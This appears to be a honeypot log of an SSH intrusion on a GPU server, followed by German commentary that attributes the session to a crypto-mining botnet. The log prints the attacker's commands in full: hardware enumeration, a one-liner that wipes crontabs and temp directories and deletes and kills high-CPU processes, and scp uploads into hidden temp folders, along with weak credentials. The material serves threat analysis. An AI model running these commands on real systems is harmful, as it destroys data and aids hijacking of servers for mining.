06.10.2026, 03:46 UTC · 26 Befehle · über ssh · Niederlande
user='ubuntu' pass='2001' ubuntu@srv01:~$ uname -s -v -n -r -m Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64 ubuntu@srv01:~$ uname -m | awk '{printf $1}' x86_64 ubuntu@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' 261 days, 00:00 ubuntu@srv01:~$ lspci | egrep VGA && lspci | grep 3D 01:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 02:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 03:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 04:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 01:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 02:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 03:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) 04:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1) ubuntu@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- AMD EPYC 7443P 24-Core Processor ubuntu@srv01:~$ curl ipinfo.io/org Cloudflare, Inc. ubuntu@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 4 ubuntu@srv01:~$ nvidia-smi -q | grep "Product Name" Product Name : NVIDIA RTX A5000 Product Name : NVIDIA RTX A5000 Product Name : NVIDIA RTX A5000 Product Name : NVIDIA RTX A5000 ubuntu@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 ubuntu@srv01:~$ uname -n | awk '{printf $1}' render03 ubuntu@srv01:~$ uname -r | awk '{printf $1}' 5.15.0-88-generic ubuntu@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… crontab: no crontab for Admin rm: cannot remove '/var/tmp/.': Permission denied rm: cannot remove '/var/tmp/..': Permission denied rm: cannot remove '/tmp/.': Permission denied rm: cannot remove '/tmp/..': Permission denied ubuntu@srv01:~$ echo 2001 > /tmp/d.log ubuntu@srv01:~$ scp -qt "/var/tmp/VUBcGGNW" ubuntu@srv01:~$ scp -qt "/tmp/VUBcGGNW" ubuntu@srv01:~$ scp -qt "/dev/shm/VUBcGGNW" ubuntu@srv01:~$ uname -s -v -n -r -m Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64 ubuntu@srv01:~$ echo !QAZ2ws3e > /tmp/d.log ubuntu@srv01:~$ scp -qt "/var/tmp/ajntAlNn" ubuntu@srv01:~$ scp -qt "/tmp/ajntAlNn" ubuntu@srv01:~$ scp -qt "/dev/shm/ajntAlNn" ubuntu@srv01:~$ uname -s -v -n -r -m Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64 ubuntu@srv01:~$ echo 11223344556677889900 > /tmp/d.log ubuntu@srv01:~$ scp -qt "/var/tmp/vuCuoQng" ubuntu@srv01:~$ scp -qt "/tmp/vuCuoQng" ubuntu@srv01:~$ scp -qt "/dev/shm/vuCuoQng"
Ein Angreifer meldete sich über SSH mit schwachen Zugangsdaten an. Er führte eine Reihe von Systemabfragen durch, um die Hardware, insbesondere die Grafikkarten, zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung. Zuletzt versuchte er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren.
Die Befehle uname, lspci und nvidia-smi ermitteln Systeminformationen und erkennen die installierten Grafikkarten. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt. Die awk-Schleife identifiziert Prozesse mit hoher CPU-Nutzung und beendet sie gewaltsam, um Ressourcen freizumachen. Die scp-Befehle versuchen, Dateien in die Verzeichnisse /var/tmp, /tmp und /dev/shm zu übertragen, was oft dem Einschleusen von Schadsoftware dient.
Das Vorgehen deutet stark auf die Installation eines Kryptomining-Bots hin. Die gezielte Abfrage nach NVIDIA-Grafikkarten und das Beenden konkurrierender Prozesse sind typische Indikatoren für Mining-Aktivitäten. Die wiederholten Dateiübertragungen in versteckte Ordner dienen der Persistenz oder dem Download des Mining-Codes.
Dieses Muster ist sehr verbreitet bei automatisierten Angriffen auf Server mit GPU-Ressourcen. Die Kombination aus Hardware-Erkennung und Prozessbereinigung ist ein Standardverfahren für Mining-Botnets.